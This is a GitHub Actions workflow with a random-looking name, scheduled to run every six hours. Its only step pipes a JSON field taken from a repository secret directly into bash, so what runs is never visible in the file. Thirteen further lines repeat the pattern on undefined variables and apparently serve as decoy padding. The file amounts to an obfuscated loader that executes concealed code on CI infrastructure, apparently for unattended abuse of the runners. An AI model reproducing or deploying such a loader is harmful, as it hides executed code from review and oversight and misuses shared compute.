name: niubajiao4328
on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'

jobs:  # 21203
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: niubajiao4328
        env:
          f85: ${{ secrets.f85 }}
        run: |
          echo $f85 | jq -r .ahi6003 | /bin/bash
          echo $ort0347 | jq -r .zshv9603 | /bin/bash
          echo $zi4 | jq -r .ak14 | /bin/bash
          echo $qb0409 | jq -r .k937 | /bin/bash
          echo $y324 | jq -r .ikv64070 | /bin/bash
          echo $c634 | jq -r .t255 | /bin/bash
          echo $ym7088 | jq -r .xlgbf82 | /bin/bash
          echo $mlp6721 | jq -r .kvqea61709 | /bin/bash
          echo $td14 | jq -r .qru45690 | /bin/bash
          echo $lgrzy9564 | jq -r .jkkai60561 | /bin/bash
          echo $ow188 | jq -r .uzj31669 | /bin/bash
          echo $xj6998 | jq -r .udlgx19260 | /bin/bash
          echo $mk719 | jq -r .r063 | /bin/bash
          echo $lzsc6 | jq -r .wkizs04 | /bin/bash

